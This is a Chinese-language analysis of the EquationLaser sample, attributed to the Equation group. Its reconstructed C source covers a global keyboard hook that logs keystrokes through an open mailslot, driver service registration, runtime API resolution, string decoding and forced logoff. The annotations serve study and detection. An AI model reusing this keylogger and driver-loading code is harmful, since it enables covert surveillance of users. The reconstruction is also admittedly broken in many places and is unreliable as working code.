EquationLaser是方程式樣本中較早的一個,從它的程式設計應用技巧的"古老"程度可以看出來;當然對於我這種程式設計經驗比較欠缺的愛好者,還是值得學習研究一下的。它會收集一些系統資訊、鍵盤記錄等。本來在資源裡有個驅動檔案,但是樣本裡的驅動已經釋放出去,資料全為零,所以主要的功能應該還沒分析到。
(僅供參考)
#include"stdafx.h"
#include<stdio.h>
#include<aclapi.h>
#include<process.h>
#include<winsock2.h>
#include<winuser.h>
#include<winnt.h>
#include<windows.h>
// Reconstructed globals. Names of the form dword_XXXXX are IDA addresses whose
// purpose was not recovered; the uses visible on this page are noted per item.
WORD MaxUdpDg=0;//word_100509c0 - largest UDP datagram size reported by WSAStartup (set in _WSAStartup)
// dword_1f74c: 1 when NewThread's OS check passes; gates SCM access and the mailslot DACL change
// dword_1f750: 1 when dwMajorVersion==5 (set in NewThread); not read elsewhere on this page
// dword_1f754: set on NewThread's 4.90 branch; not read elsewhere on this page
// dword_69f84/dword_69f88: once-only flag and cached result used by check_version()
// dword_6a010: keylogging-enabled flag - tested by record(), driven by do_read_mailslot()
DWORD dword_69f84,dword_69f88,dword_1f74c,dword_1f750,dword_1f754,dword_6a010;
LONG Addend=0; // attach reference count, adjusted with InterlockedIncrement/Decrement in DllMain
// IsDeviceOpen is never set to true on this page. IsExitWinNeeded is cleared in
// DllMain when the worker thread starts, and its false value is what triggers
// ExitWindows on detach (the name reads inverted).
bool IsDeviceOpen=false,IsExitWinNeeded;
// hDevice: device handle from load_driver_get_handle(); hThread: NewThread's handle;
// hmod: this DLL's HINSTANCE, passed to SetWindowsHookExA in set_hook();
// hHandle: released in DllMain but never created anywhere on this page.
HANDLE hDevice=INVALID_HANDLE_VALUE,hHandle=INVALID_HANDLE_VALUE,hThread=INVALID_HANDLE_VALUE,hmod=INVALID_HANDLE_VALUE;
OSVERSIONINFOA Size; // filled by GetVersionExA in NewThread; dwPlatformId read again in device_io_control_2224d8
HHOOK hhk[3]; // installed hook handles, indexed by hhook_num in set_hook()/unset_hook()
// Mailslot that ferries keystroke records from hooked processes to the collector
// thread - a useful host indicator. The buffer is 0x30 bytes, so the 0x103-byte
// lstrcpynA in do_read_mailslot over-reads it.
char mailslot_name[0x30]="\\\\.\\mailslot\\__MS_1509_";
char Name[4076]; // receives the mailslot name; opened for writing by record()
// advapi32 entry points are resolved at runtime with GetProcAddress instead of
// being imported, which keeps them out of the static import table.
// (lpSystemBame is a typo for lpSystemName in the original.)
typedef bool(WINAPI *_OpenProcessToken)(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle);
typedef bool(WINAPI *_LookupPrivilegeValue)(LPCTSTR lpSystemBame,LPCTSTR lpName,PLUID lpLuid);
typedef bool(WINAPI *_AdjustTokenPrivileges)(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,
DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength);
typedef DWORD(WINAPI *_SetSecurityInfo)(HANDLE handle,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,
PSID psidOwner,PSID psidGroup,PACL pDacl,PACL pSacl);
// Forward declarations. NOTE(review): version_info() is declared here and called
// by DllMain, but the definition below is named version(). set_hook(),
// unset_hook() and record() are used before they are defined and have no
// prototype, and read_mailslot() is not defined on this page at all.
int version_info();
int OpenServiceManager();
void compute_seed(int *a,int *b,int *c);
void ShutdownPrivilege();
unsigned int _stdcall NewThread(LPVOID para);
LRESULT fn(int code,WPARAM wParam,LPARAM lParam);
// DLL entry point. On process attach the first attacher (Addend==0) starts
// NewThread() on a 1 MiB stack and remembers the module handle so set_hook()
// can register this DLL as the hook module; Addend counts attached instances.
// On process detach it tears down the device handle, signals hHandle, sleeps
// 3 s and, if IsExitWinNeeded is false, enables a privilege and calls
// ExitWindows(). Creating a thread from DllMain runs under the loader lock,
// which is a known hazard but matches what the reconstruction shows.
BOOL APIENTRY DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH://1
{
if(version_info()==0) // 0 == OS acceptable to the sample
{
if(Addend==0) // first attach in this process: start the worker thread
{
hThread=(HANDLE)_beginthreadex(0,0x100000,&NewThread,0,0,0); // 0x100000 = 1 MiB stack
if(hThread!=NULL)
{
IsExitWinNeeded=false;
}
else
{
return true; // thread creation failed: stay loaded but idle
}
}
hmod=hinstDLL; // hook module handle used by set_hook()
InterlockedIncrement(&Addend);
}
break;
}
/*
case DLL_THREAD_ATTACH://2
{
break;
}
case DLL_THREAD_DETACH://3
{
break;
}
*/
case DLL_PROCESS_DETACH://0
{
//
if(version_info()==0)
{
InterlockedDecrement(&Addend);
if(Addend==0)
{
//sub_1000f7fb - last instance cleanup, not recovered
}
if(IsDeviceOpen!=false)
{
// NOTE(review): the two branches look swapped - a valid handle is closed
// but never cleared, while an INVALID handle is the one that gets reset.
// Confirm against the disassembly before relying on this.
if(hDevice!=INVALID_HANDLE_VALUE)
{
CloseHandle(hDevice);
}
else
{
hDevice=NULL;
IsDeviceOpen=false;
}
}
ReleaseSemaphore(hHandle,7,0); // hHandle is never created on this page
Sleep(0xbb8); // 3000 ms
if(IsExitWinNeeded==false)
{
// Forced session end on unload. Note the ExitWindows() macro discards its
// arguments and expands to ExitWindowsEx(EWX_LOGOFF,...); if the binary
// calls ExitWindowsEx(6,0) directly, 6 is EWX_REBOOT|EWX_FORCE - confirm.
ShutdownPrivilege();
ExitWindows(6,0);
}
}
break;
}
}
return TRUE;
}
// OS gate derived from the packed GetVersion() result: low byte of the low
// word is the major version, high byte the minor; bit 31 set means a non-NT
// (Windows 9x) platform. Returns 0 when the platform is acceptable to the
// sample and 1 when it is too old.
// NOTE(review): the prototype above declares version_info(), which DllMain
// calls, but this definition is named version(); reconcile before building.
int version()
{
DWORD packed=GetVersion();
DWORD major=(DWORD)LOBYTE(LOWORD(packed));
DWORD minor=(DWORD)HIBYTE(LOWORD(packed));
if(packed<0x80000000)
{
// Windows NT family: only NT 3.x below 3.50 (minor 0x32) is rejected.
if(major!=3)
{
return 0;
}
return minor>=0x32?0:1;
}
// Windows 9x family: anything below 4.0 is rejected.
return major>=4?0:1;
}
// Worker thread started from DllMain. Suppresses error dialogs, records the OS
// version in the global Size and derives the dword_1f7xx flags from it, then on
// the accepted platform waits until the Service Control Manager can be opened.
// Whatever followed (the empty /* */ before the return) was not recovered.
// Always returns 0.
unsigned int _stdcall NewThread(LPVOID para)
{
//
SetThreadPriority(GetCurrentThread(),0); // THREAD_PRIORITY_NORMAL
SetErrorMode(0x8003); // SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX: no crash/error boxes
Size.dwOSVersionInfoSize=0x94; // sizeof(OSVERSIONINFOA)
if(GetVersionExA(&Size)==1)
{
// NOTE(review): dwOSVersionInfoSize was just set to 0x94, so this comparison
// with 2 can never hold; the intended field is almost certainly dwPlatformId
// (VER_PLATFORM_WIN32_NT == 2). Confirm against the disassembly.
if(Size.dwOSVersionInfoSize==2)
{
dword_1f74c=1; // NT platform
if(Size.dwMajorVersion==5)
{
dword_1f750=1; // 5.x kernel (2000/XP/2003)
}
}
else
{
if((Size.dwMajorVersion==4)&&(Size.dwMinorVersion==0x5a)) // 4.90 = Windows Me
{
dword_1f754=1;
dword_1f74c=1;
}
else
{
dword_1f754=0;
}
}
}
if(dword_1f74c==1)
{
if(OpenServiceManager()!=0) // as written OpenServiceManager() always returns 0
{
return 0;
}
}
/*
*/
return 0;
}
// Waits until the SCM can be opened with SC_MANAGER_ALL_ACCESS (0xf003f),
// retrying every 60 s, then closes the handle. Always returns 0.
// NOTE(review): OpenSCManagerA returns NULL on failure, not INVALID_HANDLE_VALUE,
// so the retry branch is never taken as written; if it were, the recursion is
// unbounded and the outer call would still CloseServiceHandle its own failed
// handle. Opening the SCM with full access from an injected DLL is itself a
// behaviour worth alerting on.
int OpenServiceManager()
{
SC_HANDLE sc_handle=INVALID_HANDLE_VALUE;
sc_handle=OpenSCManagerA(0,0,0xf003f); // 0xf003f = SC_MANAGER_ALL_ACCESS
if(sc_handle==INVALID_HANDLE_VALUE)
{
Sleep(0xea60); // 60000 ms
OpenServiceManager();
}
CloseServiceHandle(sc_handle);
return 0;
}
// In-place string decoder. Each byte is XORed with the keystream word that
// compute_seed() produces, shifted right by an amount chosen by the previous
// ciphertext byte's low three bits (3 for the first byte). The seeds
// 0x9ea6/0x4f53/7 are fixed, so a given ciphertext always decodes the same
// way, which makes this directly reusable for recovering the sample's strings.
// `length` bytes starting at `string` are rewritten; nothing is returned.
void decode(char *string,int length)
{
int seed_a=0x9ea6,seed_b=0x4f53,seed_c=0x7;
int shift=3;
for(int pos=0;length!=0;length--,pos++)
{
compute_seed(&seed_a,&seed_b,&seed_c);
int next_shift=string[pos]&7; // taken from the still-encoded byte
string[pos]=(seed_a>>shift)^string[pos];
shift=next_shift;
}
}
// One step of the keystream generator behind decode(). With mixed computed
// from the incoming a as (a*8)|(a>>13), the state advances as
//   a <- a ^ b
//   b <- c ^ (mixed & 0xfff8)   (c read before it is updated)
//   c <- mixed & 7
// All three values are updated in place. Starting from the seeds decode()
// uses, a never exceeds 16 bits, so the multiply by 8 cannot overflow.
void compute_seed(int *a,int *b,int *c)
{
const int mixed=((*a)*8)|((*a)>>13);
*a=(*a)^(*b);
*b=(*c)^(mixed&0xfff8);
*c=mixed&7;
}
// Creates the service key HKLM\System\CurrentControlSet\Services\Fdisk with
// Type=1 (SERVICE_KERNEL_DRIVER), Start=3 (SERVICE_DEMAND_START) and
// ErrorControl=0 (SERVICE_ERROR_IGNORE) - the minimal entry a driver load
// needs; load_driver_get_handle() then opens the device. Returns 1 when all
// three values were written, 0 otherwise. Creation of this key is a good
// persistence/driver-load indicator to monitor.
// NOTE(review): `Class` is passed uninitialised (NULL is what the API
// expects), and RegSetValueEx wants a const BYTE* - the reconstruction does
// not compile as written. 0x0f003f = KEY_ALL_ACCESS, value type 4 = REG_DWORD.
int GetRegkeyReady()
{
char *Class;
int finished=0;
DWORD dwDisposition,data;
HKEY hkResult;
if(RegCreateKeyExA(HKEY_LOCAL_MACHINE/*0x80000002*/,"System\\CurrentControlSet\\Services\\Fdisk",0,Class,0,0x0f003f,
0,&hkResult,&dwDisposition)==0)
{
data=1; // SERVICE_KERNEL_DRIVER
if(RegSetValueEx(hkResult,"Type",0,4,&data,4)==0)
{
data=3; // SERVICE_DEMAND_START
if(RegSetValueEx(hkResult,"Start",0,4,&data,4)==0)
{
data=0; // SERVICE_ERROR_IGNORE
if(RegSetValueEx(hkResult,"ErrorControl",0,4,&data,4)==0)
{
finished=1;
}
}
}
RegCloseKey(hkResult);
}
return finished;
}
// Opens the driver's device object for read/write and stores the handle in
// the global hDevice. Returns true when the open succeeded. Steps 1-3 in the
// original comment (privilege, NtLoadDriver) are not implemented here; only
// the final CreateFileA is.
// NOTE(review): the literal "\\.\fdisk0" contains a form-feed escape (\f);
// the device path is presumably "\\\\.\\fdisk0" - confirm against the binary.
// 0xc0000000 = GENERIC_READ|GENERIC_WRITE, 3 = OPEN_EXISTING,
// 0x80 = FILE_ATTRIBUTE_NORMAL.
bool load_driver_get_handle()
{
/*
1,get load driver privilege
2,get address of NtLoadDriver(IN PUNICODE_STRING DriverServiceName)
3,load driver by call NtLoadDriver(\Registry\Machine\System\CurrentControlSet\Services\Fdisk)
*/
hDevice=CreateFileA("\\.\fdisk0",0xc0000000,0,0,3,0x80,0);
return hDevice==INVALID_HANDLE_VALUE?0:1;
}
// Sends IOCTL 0x2224d8 to the open device with no input or output buffer.
// Decoded per the CTL_CODE layout: FILE_DEVICE_UNKNOWN (0x22), function
// 0x936, METHOD_BUFFERED, FILE_ANY_ACCESS. What the driver does with it is
// not recoverable from this page (the driver resource was zeroed).
// Returns false when the platform is not NT, the device is not open, or the
// call fails.
// NOTE(review): there is no return on the success path or on the non-NT path,
// so the result is undefined there; presumably `return true;` was intended.
bool device_io_control_2224d8()
{
DWORD ByteReturned=0;
if(Size.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
if(hDevice!=INVALID_HANDLE_VALUE)
{
if(false==DeviceIoControl(hDevice,0x2224d8,0,0,0,0,&ByteReturned,0))
{
return false;
}
}
else
{
return false;
}
}
}
// Reads one PCI configuration-space dword. The (commented-out) inline asm
// saves the current value of port 0xCF8 (CONFIG_ADDRESS), writes
// address&~3 to it, reads the dword from port 0xCFC+(address&3)
// (CONFIG_DATA), restores the saved CONFIG_ADDRESS and returns the value
// read. This is hardware fingerprinting; since in/out instructions only
// execute at ring 0, a user-mode DLL would fault here, which suggests the
// code belongs with the unrecovered driver component.
// NOTE(review): the body is entirely commented out and the function has no
// return statement, so callers receive an undefined value as written.
DWORD get_hardware_info(DWORD address)//get some hardware information
{
DWORD num1,num2,num3;
/*
mov dx,0cf8h
in eax,dx
mov num2,eax          ; save current CONFIG_ADDRESS
mov ecx,address
mov num1,0cf8h
mov eax,ecx
and al,0fch           ; dword-align the address
mov address,eax
out dx,eax            ; select the config register
and ecx,3
add ecx,0cfch         ; CONFIG_DATA port + byte offset
mov address,ecx
mov dx,address
in eax,dx
mov num1,eax          ; value read
mov ecx,num2
mov num2,0cf8h
and ecx,0fffffffch
mov address,ecx
mov dx,num2
mov eax,address
out dx,eax            ; restore the previous CONFIG_ADDRESS
;
mov eax,num1          ; return value
*/
}
// Cached "is this the NT platform" check via GetVersionExA; the answer is
// kept in dword_69f88 and dword_69f84 marks it as computed. Returns the
// cached flag. Exits the process with code 2 after a message box when the
// version query fails.
// NOTE(review): three things look inverted or mistyped in this reconstruction:
// GetVersionExA returns non-zero on SUCCESS, so the error branch fires on
// success; `VER_PLATFORM_WIN32_NT==version_info` compares against the whole
// struct instead of version_info.dwPlatformId; and the outer test presumably
// meant dword_69f84==0 (compute once, then cache). Confirm against the binary.
bool check_version()//VER_PLATFORM_WIN32_NT
{
OSVERSIONINFOA version_info;
version_info.dwOSVersionInfoSize=0x94; // sizeof(OSVERSIONINFOA)
if(dword_69f84!=0)
{
if(0!=GetVersionExA(&version_info))
{
MessageBoxA(NULL,"Failed to get Windows version",NULL,NULL);
exit(2);
}
else
{
if(VER_PLATFORM_WIN32_NT==version_info)
{
dword_69f84=1;
dword_69f88=1;
}
else
{
dword_69f88=0;
}
}
}
return dword_69f88;
}
// Enables one privilege on the current process token, using advapi32 functions
// resolved at runtime with GetProcAddress (keeps them out of the import table).
// Called from DllMain right before ExitWindows(). 0x28 = TOKEN_ADJUST_PRIVILEGES
// |TOKEN_QUERY; 0x10 = sizeof(TOKEN_PRIVILEGES). No return value; failures are
// silent.
// NOTE(review): "SeShutdownDriverPrivilege" is not a Windows privilege name -
// SeShutdownPrivilege (fits the ExitWindows caller) or SeLoadDriverPrivilege
// (the header comment) are the plausible originals. "LookupPrivilegeValue" is
// not an export either; advapi32 exports the A/W variants. `handle` is
// uninitialised when the early branches fail, so the CloseHandle at the end
// may act on garbage; `ret` is unused.
void ShutdownPrivilege()//SeLoadDriverPrivilege
{
int ret=0;
HMODULE hObject;
HANDLE handle;
LUID l_luid={0};
TOKEN_PRIVILEGES l_token_privilege={0};
_OpenProcessToken l_OpenProcessToken;
_LookupPrivilegeValue l_LookupPrivilegeValue;
_AdjustTokenPrivileges l_AdjustTokenPrivileges;
hObject=LoadLibrary("ADVAPI32.DLL");
if(hObject!=NULL)
{
l_OpenProcessToken=(_OpenProcessToken)GetProcAddress(hObject,"OpenProcessToken");
if(l_OpenProcessToken!=0)
{
l_LookupPrivilegeValue=(_LookupPrivilegeValue)GetProcAddress(hObject,"LookupPrivilegeValue");
if(l_LookupPrivilegeValue!=0)
{
l_AdjustTokenPrivileges=(_AdjustTokenPrivileges)GetProcAddress(hObject,"AdjustTokenPrivileges");
if(l_AdjustTokenPrivileges!=0)
{
if(l_OpenProcessToken(GetCurrentProcess(),0x28,&handle)==true) // TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY
{
if(l_LookupPrivilegeValue(0,"SeShutdownDriverPrivilege",&l_luid)==true)
{
l_token_privilege.Privileges->Luid.HighPart=l_luid.HighPart;
l_token_privilege.Privileges->Luid.LowPart=l_luid.LowPart;
l_token_privilege.Privileges->Attributes=SE_PRIVILEGE_ENABLED;
l_token_privilege.PrivilegeCount=1;
l_AdjustTokenPrivileges(handle,false,&l_token_privilege,0x10,0,0); // result not checked
//if(GetLastError()==0)
//{
// if(handle!=NULL)
// CloseHandle(handle);
// FreeLibrary(hObject);
//}
}
}
}
}
}
}
if(handle!=NULL)
CloseHandle(handle);
if(hObject!=NULL)
FreeLibrary(hObject);
}
// Initialises Winsock at wVersionRequested and checks that the library supports
// at least that version (LOBYTE = major, HIBYTE = minor) and at least socket_num
// sockets; on success stores iMaxUdpDg in the global MaxUdpDg.
// Returns 0 on success, 1 otherwise. The failure paths after a successful
// WSAStartup never call WSACleanup.
// NOTE(review): once the first test is false the else-if condition is always
// true, so it could be a plain else. iMaxSockets/iMaxUdpDg are Winsock 1.1
// fields that the Winsock 2 documentation says to ignore.
int _WSAStartup(WORD wVersionRequested,char socket_num)
{
WSAData wsaData;
if(0!=WSAStartup(wVersionRequested,&wsaData))
{
return 1;
}
if(LOBYTE(wsaData.wVersion)<LOBYTE(wVersionRequested)||HIBYTE(wsaData.wVersion)<HIBYTE(wVersionRequested))
{
return 1; // library older than requested
}
else if(LOBYTE(wsaData.wVersion)!=LOBYTE(wVersionRequested)||(LOBYTE(wsaData.wVersion)==LOBYTE(wVersionRequested)&&HIBYTE(wsaData.wVersion)>=HIBYTE(wVersionRequested)))
{
if(wsaData.iMaxSockets<socket_num)
{
return 1;
}
MaxUdpDg=wsaData.iMaxUdpDg;
return 0;
}
}
// Switches the calling thread onto the interactive window station (winsta0)
// and the named desktop, installs (set_or_unset!=0) or removes (==0) the
// keyboard hook there, then switches back and closes what it opened. This is
// how a DLL running in a non-interactive (service) process gets its hook onto
// the user's desktop: OpenWindowStationA("winsta0") followed by
// SetWindowsHookExA from such a process is the sequence to look for.
// Returns 1 on success, 0 on any failure.
// NOTE(review): reconstruction problems - lpszDesktop (char*) is overwritten
// with the HDESK from OpenDesktopA; unset_hook() is called without its
// hhook_num argument; and the last condition tests CloseWindowStation() for
// success while the other two test for failure, so that clause's intent is
// unclear. The ret=0 assignments are redundant since ret starts at 0.
int windows_hook(char *lpszDesktop,int hhook_num,int set_or_unset)
{
int ret=0;
HWINSTA hWinSta=NULL;
HWINSTA hWinSta0=NULL;
HDESK hDesktop=NULL;
do
{
hWinSta=GetProcessWindowStation(); // remembered so it can be restored below
if(hWinSta==NULL)
{
ret=0;
break;
}
hDesktop=GetThreadDesktop(GetCurrentThreadId());
if(hDesktop==NULL)
{
ret=0;
break;
}
hWinSta0=OpenWindowStationA("winsta0",false,WINSTA_ALL_ACCESS); // interactive station
if(hWinSta0==NULL)
{
ret=0;
break;
}
if(false==SetProcessWindowStation(hWinSta0))
{
ret=0;
break;
}
lpszDesktop=OpenDesktopA(lpszDesktop,0,false,MAXIMUM_ALLOWED);
if(lpszDesktop==NULL)
{
ret=0;
break;
}
if(false==SetThreadDesktop(lpszDesktop))
{
ret=0;
break;
}
if(set_or_unset==0)
{
unset_hook();
}
else
{
if(0==set_hook(hhook_num))
{
ret=0;
break;
}
}
// restore the original station/desktop before leaving
if(0==SetProcessWindowStation(hWinSta)||0==SetThreadDesktop(hDesktop)||CloseWindowStation(hWinSta0))
{
ret=CloseDesktop(lpszDesktop)?1:0;
}
}while(0);
return ret;
}
// Installs a system-wide WH_KEYBOARD hook (thread id 0 = all threads) whose
// procedure fn() lives in this DLL (hmod), so the DLL is mapped into every GUI
// process and sees every keystroke; the handle is stored in hhk[hhook_num].
// Returns 1 when the hook was installed, 0 otherwise. The detection-relevant
// call is SetWindowsHookExA(WH_KEYBOARD,...,0) made from a DLL.
// NOTE(review): InterlockedExchange takes a LONG* and a LONG; passing an
// HHOOK* and an HHOOK is a type mismatch in this reconstruction. Sleep(0) only
// yields the timeslice.
int set_hook(int hhook_num)//record key stroke
{
HHOOK hook=NULL;
Sleep(0);
hook=SetWindowsHookExA(WH_KEYBOARD,(HOOKPROC)fn,hmod,0);
InterlockedExchange(hhk+hhook_num,hook);
return hhk[hhook_num]?1:0;
}
// Removes the hook stored in hhk[hhook_num], if any, and clears the slot.
// The UnhookWindowsHookEx result is not checked. Note windows_hook() calls
// this without an argument, which does not match this signature.
void unset_hook(int hhook_num)
{
if(hhk[hhook_num]!=NULL)
{
Sleep(0); // yield only
UnhookWindowsHookEx(hhk[hhook_num]);
hhk[hhook_num]=NULL;
}
}
// Hook procedure registered by set_hook(); forwards everything to record().
// NOTE(review): a hook procedure must be CALLBACK (stdcall), and this passes
// the whole hhk array where record() takes a single HHOOK - presumably
// hhk[<index>] was intended. Confirm against the disassembly.
LRESULT fn(int code,WPARAM wParam,LPARAM lParam)
{
return record(hhk,code,wParam,lParam);
}
// Keyboard-hook body. Always chains to the next hook first; for HC_ACTION
// (code==0), while dword_6a010 is set, it writes an 8-byte record built from
// the process id, wParam (virtual-key code) and lParam (repeat/scan/transition
// bits) to the mailslot named in Name, clearing dword_6a010 when the mailslot
// cannot be opened. Returns the chained hook result. Writes to
// \\.\mailslot\__MS_1509_ from many processes are the observable side effect.
// NOTE(review): as reconstructed, buffer is three WORDs (6 bytes) but 8 bytes
// are written, and wParam/lParam are truncated to 16 bits; an 8-byte record
// such as {WORD pid, WORD vk, DWORD lParam} seems more likely - confirm.
// WriteFile is still attempted after CreateFile fails, and a successful open
// followed by a failed write leaks the handle. CallnextHookEx and null are
// spelling errors.
int record(HHOOK hhk,int code,WPARAM wParam,LPARAM lParam)
{
HANDLE file=INVALID_HANDLE_VALUE;
DWORD NumberOfBytesWritten=0;
WORD buffer[3]={0};
LONG result=0;
result=CallnextHookEx(hhk,code,wParam,lParam);
if(code==0) // HC_ACTION
{
if(dword_6a010!=0) // collector thread has the mailslot open
{
buffer[0]=GetCurrentProcessId();
buffer[1]=wParam;
buffer[2]=lParam; //0X40000000 1 3
file=CreateFile(Name,GENERIC_WRITE,FILE_SHARE_DELETE,null,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(INVALID_HANDLE_VALUE==file)
{
dword_6a010=0;
}
if(true==WriteFile(file,buffer,8,&NumberOfBytesWritten,NULL))
{
CloseHandle(file);
dword_6a010=1;
}
}
}
return result;
}
// Collector thread. lParam is presumably a context struct; only two offsets
// are used: +0x2c0 (log file path) and +0x2bc (size limit). It opens the log
// for appending, creates the mailslot \\.\mailslot\__MS_1509_, and on NT
// applies a NULL DACL to it so every hooked process can write to it whatever
// user it runs as: SECURITY_INFORMATION value 4 is DACL_SECURITY_INFORMATION
// (PROCESS_SET_SESSIONID is a mis-named constant with the same value) and
// pDacl is NULL. It then polls the mailslot every 250 ms, appending each
// record to the log while dword_6a010 is set, and stops when a read fails or
// the limit is reached. A mailslot with a NULL DACL is a clear indicator.
// NOTE(review): reconstruction issues - Clean_hook_and_key vs
// clean_hook_and_key (two spellings), ERROR_SUCCESSW, arithmetic on a PVOID,
// lstrcpynA copying 0x103 bytes out of a 0x30-byte source, a DWORD WINAPI
// thread calling _endthreadex, WriteFile with both lpNumberOfBytesWritten and
// lpOverlapped NULL (not allowed), and the limit check comparing the last
// chunk rather than bytes_num. The function falls off the end without a
// return when any inner condition fails. read_mailslot() is not on this page.
DWORD WINAPI do_read_mailslot(LPARAM lParam)
{
char buffer[0x50];
DWORD bytes_num=0,nNumberOfBytesToWrite;
HANDLE hObject=INVALID_HANDLE_VALUE;
HANDLE hMailslot=INVALID_HANDLE_VALUE;//4
HMODULE hModule=INVALID_HANDLE_VALUE;
_SetSecurityInfo l_SetSecurityInfo=NULL;
hObject=CreateFile((char *)lParam+0x2c0,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL); // log file
if(INVALID_HANDLE_VALUE!=hObject)
{
bytes_num=SetFilePointer(hObject,0,NULL,FILE_END); // current log size
if(bytes_num>*(DWORD *)((PVOID)lParam+0x2bc)) // already over the limit
{
CloseHandle(hObject);
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
lstrcpynA(Name,mailslot_name,0x103);
hMailslot=CreateMailslotA(Name,0,0,NULL);
if(INVALID_HANDLE_VALUE==hMailslot)
{
CloseHandle(hObject);
clean_hook_and_key(lParam);
_endthreadex(1);
}
if(0!=dword_1f74c) // NT only: relax the mailslot's DACL
{
hModule=LoadLibraryA("advapi32.dll");
if(hModule)
{
l_SetSecurityInfo=(_SetSecurityInfo)GetProcAddress(hModule,"SetSecurityInfo");
if(NULL!=l_SetSecurityInfo)
{ //6
// 4 == DACL_SECURITY_INFORMATION with pDacl NULL -> NULL DACL (everyone)
if(ERROR_SUCCESSW==l_SetSecurityInfo(hMailslot,SE_KERNEL_OBJECT,PROCESS_SET_SESSIONID,NULL,NULL,NULL,NULL))
{
nNumberOfBytesToWrite=0;
dword_6a010=1; // tells record() it may write
do
{
nNumberOfBytesToWrite=0x50;
if(0!=read_mailslot(hMailslot,buffer,&nNumberOfBytesToWrite))
{
if(nNumberOfBytesToWrite>0)
{
if(true==WriteFile(hObject,buffer,nNumberOfBytesToWrite,NULL,NULL))
{
bytes_num+=nNumberOfBytesToWrite;
if(nNumberOfBytesToWrite>=*(DWORD *)((char *)lParam+0x2bc))
{
dword_6a010=0;
}
}
}
}
else
{
dword_6a010=0;
}
Sleep(0xfa); // 250 ms poll
}while(dword_6a010);
CloseHandle(hObject);
CloseHandle(hMailslot);
clean_hook_and_key(lParam);
return 0;
}
}
}
}
}
else
{
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
}
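// Returns true when the volume at lpRootPathName (a root path such as "C:\\")
// is NTFS and reports FILE_PERSISTENT_ACLS, i.e. it preserves and enforces
// ACLs. Returns false for a NULL path, when GetVolumeInformationA fails, or
// when either condition is not met.
// Changes from the reconstruction: the parameter was declared `char` (cannot
// hold a path), the last two GetVolumeInformation arguments were swapped
// (buffer before size), and the flag was compared with == although it is one
// bit in a flag word.
bool check_root_drive_info(const char *lpRootPathName)
{
DWORD FileSystemFlags=0;
DWORD MaximumComponentLength=0;
char FileSystemNameBuffer[MAX_PATH]={0};
if(lpRootPathName==NULL)
{
return false;
}
if(!GetVolumeInformationA(lpRootPathName,NULL,0,NULL,&MaximumComponentLength,&FileSystemFlags,FileSystemNameBuffer,MAX_PATH))
{
return false;
}
/*
FILE_PERSISTENT_ACLS,The specified volume preserves and enforces
access control lists(ACL).For example,the NTFS file system preserves
and enforces ACLs,and the FAT file system does not.
*/
// A real NTFS volume reports many flags at once, so test the bit with &.
return lstrcmpA(FileSystemNameBuffer,"NTFS")==0&&(FileSystemFlags&FILE_PERSISTENT_ACLS)!=0;
}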
// Connect-with-timeout helper: waits up to optlen milliseconds for the global
// socket `sock` to become writable or to land in the exception set, and on
// timeout reads SO_ERROR. In C++ this overloads Winsock's select(); the
// five-argument call inside resolves to the Winsock one. Intended result:
// 1 when writable and not in error, 0 otherwise.
// NOTE(review): this block is not compilable as written - `1=select(...)`
// assigns to a literal, fd_array is an array rather than a pointer, `sock` is
// not declared on this page, the sub-second branch stores milliseconds*1000 in
// tv_sec instead of tv_usec, getsockopt's result is OR'd with 0xff, and the
// success path has no return. Treat it as a sketch of the original routine.
int select(DWORD optlen)
{
fd_set writefds;
fd_set exceptfds;
char* optval=NULL;
timeval timeout;
writefds.fd_count=1;
writefds.fd_array=sock;
exceptfds.fd_count=1;
exceptfds.fd_array=sock;
if(optlen>0x3e8) // more than 1000 ms: whole seconds
{
timeout.tv_usec=0;
timeout.tv_sec=optlen/0x3e8;
}
else
{
timeout.tv_usec=0;
timeout.tv_sec=0x3e8*optlen;
}
if(1=select(0,NULL,&writefds,&exceptfds,&timeout))
{
if(0==_WSAFDIsSet(sock,&exceptfds))
{
return _WSAFDIsSet(sock,&writefds)>0?1:0;
}
}
else
{
optlen=4; // sizeof(int) for SO_ERROR
return getsockopt(sock,SOL_SOCKET,SO_ERROR,(char*)&optval,&optlen)|0xff;
}
}
// Teardown helper called on every exit path of do_read_mailslot(); its body
// was not recovered from the sample. Two call sites spell it
// Clean_hook_and_key (capital C), which will not resolve to this definition.
void clean_hook_and_key(void* lparam)
{
/*
*/
}